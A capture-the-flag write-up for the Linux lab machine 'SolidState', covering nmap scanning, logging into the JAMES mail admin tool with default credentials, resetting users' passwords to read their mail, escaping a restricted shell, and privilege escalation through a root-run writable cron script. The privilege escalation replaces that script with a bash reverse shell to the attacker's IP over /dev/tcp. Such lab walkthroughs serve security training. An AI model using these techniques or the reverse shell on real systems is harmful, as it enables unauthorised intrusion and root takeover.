[*] INDEX:
[+] BOX INFO 💻 :
Operative System : Linux 🐧
Difficulty : Medium 🌓
Owner : ch33zplz
IP : 10.10.10.51
[+] PART 1 - GAIN ACCESS
The first step is scanning machine’s ports with nmap:
[*] Extracting information....
[*] IP Adress: 10.10.10.51
[*] Open ports: 22,25,80,110,119,4555
[*] Ports has been copied to clipboard
Let’s get a deeper scan on those ports :
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey:
| 2048 77:00:84:f5:78:b9:c7:d3:54:cf:71:2e:0d:52:6d:8b (RSA)
| 256 78:b8:3a:f6:60:19:06:91:f5:53:92:1d:3f:48:ed:53 (ECDSA)
|_ 256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (ED25519)
25/tcp open smtp JAMES smtpd 2.3.2
|_smtp-commands: solidstate Hello nmap.scanme.org (10.10.14.15 [10.10.14.15]),
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Home - Solid State Security
110/tcp open pop3 JAMES pop3d 2.3.2
119/tcp open nntp JAMES nntpd (posting ok)
4555/tcp open rsip?
| fingerprint-strings:
| GenericLines:
| JAMES Remote Administration Tool 2.3.2
| Please enter your login and password
| Login id:
| Password:
| Login failed for
|_ Login id:
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port4555-TCP:V=7.91%I=7%D=6/13%Time=60C61499%P=x86_64-pc-linux-gnu%r(Ge
SF:nericLines,7C,"JAMES\x20Remote\x20Administration\x20Tool\x202\.3\.2\nPl
SF:ease\x20enter\x20your\x20login\x20and\x20password\nLogin\x20id:\nPasswo
SF:rd:\nLogin\x20failed\x20for\x20\nLogin\x20id:\n");
Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel
We can see that there is a service called JAMES, and on port 4555 there is a login, let’s try with default creds :
It worked! Let’s check the list of commands :
HELP
Currently implemented commands:
help display this help
listusers display existing accounts
countusers display the number of existing accounts
adduser [username] [password] add a new user
verify [username] verify if specified user exist
deluser [username] delete existing user
setpassword [username] [password] sets a user's password
setalias [user] [alias] locally forwards all email for 'user' to 'alias'
showalias [username] shows a user's current email alias
unsetalias [user] unsets an alias for 'user'
setforwarding [username] [emailaddress] forwards a user's email to another email address
showforwarding [username] shows a user's current email forwarding
unsetforwarding [username] removes a forward
user [repositoryname] change to another user repository
shutdown kills the current JVM (convenient when James is run as a daemon)
quit close connection
Let’s list the users with listusers:
Existing accounts 5
user: james
user: thomas
user: john
user: mindy
user: mailadmin
As we can see in the list of commands, we can change users password with the command setpassword, let’s change their passwords to “password”:
This could be for the service JAMES, so let’s try to log in to the port 110, we’ll use telnet:
All the commands I have used can be found here
So as we can see, the james’ files are emty, so let’s try with the rest of users …
John has a file, let0s see wht it is :
Interesting… Let’s check mindy :
Nice, some creds! Let’s login through ssh:
[+] PART 2 - PRIVESC
This shell is kinda weird, this is a restricted bash as the email suggested. I tried to “bypass” that with the following command :
It worked! I escaped from the limited shell 😆. After ennumerating the system for a while this is what I found inside /opt :
#!/usr/bin/env python
import os
import sys
try:
os.system('rm -r /tmp/* ')
except:
sys.exit()
There is a file owned by root, which we are allowed to edit, given that weird file let’s check if it’s being run. In my case I’ll be using Pspy :
From our local machine :
From the victim machine :
./pspy32
Now, if we wait and check the output of the script we can point out this :
That’s right, as we could guess, the script is running periodically as root, let’s try to change the tmp.py to:
#!/usr/bin/env python
import os
os.system("bash -c 'bash -i >& /dev/tcp/10.10.14.15/8989 0>&1'")
Now we just have to listen from our port 8989 :
And wait …